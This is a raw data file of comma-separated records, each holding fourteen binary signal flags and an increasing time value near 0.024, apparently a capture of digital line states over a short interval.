0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012084e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012128e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012152e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012160e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012180e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012204e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012228e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012308e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012352e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012380e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012404e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012436e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012452e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012476e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012500e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012524e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012552e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012576e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012580e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012628e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012660e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012676e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012700e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012708e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012752e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012780e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012784e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012828e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012852e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4012900e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012928e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012932e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4012952e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4012976e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4012984e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013004e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013028e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013052e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013076e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013100e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013124e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013152e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013176e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013204e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013228e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013232e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013252e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013276e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013300e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013324e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013352e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013376e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013384e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013500e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013508e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013552e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013580e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013604e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013628e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013636e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013724e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013752e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013776e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013780e-02 0,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4013828e-02 0,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4013852e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013860e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013876e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013900e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013924e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4013952e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4013980e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014004e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014028e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014052e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014076e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014100e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014128e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014152e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014176e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014204e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014228e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014252e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014276e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014300e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014324e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014352e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014376e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014404e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014428e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014452e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014476e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014500e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014524e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014552e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014600e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014624e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014652e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014676e-02 0,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4014700e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4014724e-02 0,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139124e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139356e-02 1,1,1,0,0,0,0,0,0,0,0,1,0,1,2.4139372e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139404e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4139688e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139712e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4139732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139756e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4139780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139808e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4139832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139860e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,1,2.4139884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,1,2.4139908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,1,2.4139912e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4139956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4139980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4139988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140008e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140208e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140232e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140260e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,2.4140284e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4140288e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4140332e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4140356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140364e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140408e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4140412e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4140460e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4140484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140492e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140580e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140608e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140632e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140660e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140780e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140808e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140832e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4140956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4140980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141008e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141032e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141036e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4141084e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141116e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141208e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141232e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141356e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141408e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141460e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141484e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141508e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141556e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141564e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4141608e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141632e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141640e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141656e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141684e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141708e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141732e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141756e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141780e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141788e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4141836e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141856e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.4141864e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141868e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4141884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141908e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141912e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4141956e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4141980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4141988e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142032e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142184e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142208e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4142212e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4142256e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4142284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142288e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142356e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142408e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142452e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4142460e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4142484e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4142508e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4142532e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4142556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142608e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142632e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142756e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142808e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142852e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142884e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142908e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4142956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4142980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143008e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143032e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143052e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143108e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143156e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143164e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4143208e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143232e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143240e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143256e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143408e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143432e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143436e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4143484e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143516e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143532e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143556e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143608e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143632e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143708e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143712e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4143756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4143780e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143788e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143808e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143832e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4143956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4143980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144008e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144060e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,2.4144084e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144088e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144132e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144164e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144208e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144232e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144308e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144312e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144380e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144388e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144408e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144432e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144484e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144508e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144532e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144580e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144588e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144632e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144660e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.4144664e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144668e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144708e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144712e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144780e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144808e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144832e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4144860e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4144884e-02 1,1,1,0,0,1,0,0,0,0,0,0,0,0,2.4144888e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144892e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144932e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4144956e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4144980e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145008e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145032e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145060e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145084e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145108e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145132e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145156e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145180e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145208e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145232e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145260e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145284e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145308e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145332e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145356e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145364e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4145408e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145432e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145440e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145460e-02 1,1,1,0,0,0,0,0,0,1,0,0,0,0,2.4145484e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145488e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4145532e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145556e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145564e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145580e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145608e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145632e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145660e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145684e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145708e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145732e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145756e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145764e-02 1,1,1,0,0,1,0,0,0,1,0,0,1,0,2.4145808e-02 1,1,1,0,0,1,0,0,0,1,0,0,0,0,2.4145832e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145840e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145860e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145884e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145908e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145932e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4145956e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4145980e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146008e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146032e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146060e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146084e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146108e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146132e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146156e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146180e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146208e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146232e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146260e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146284e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146308e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146332e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146356e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146380e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146408e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146432e-02 1,1,1,0,0,0,0,0,0,0,0,0,1,0,2.4146460e-02 1,1,1,0,0,0,0,0,0,0,0,0,0,0,2.4146484e-02 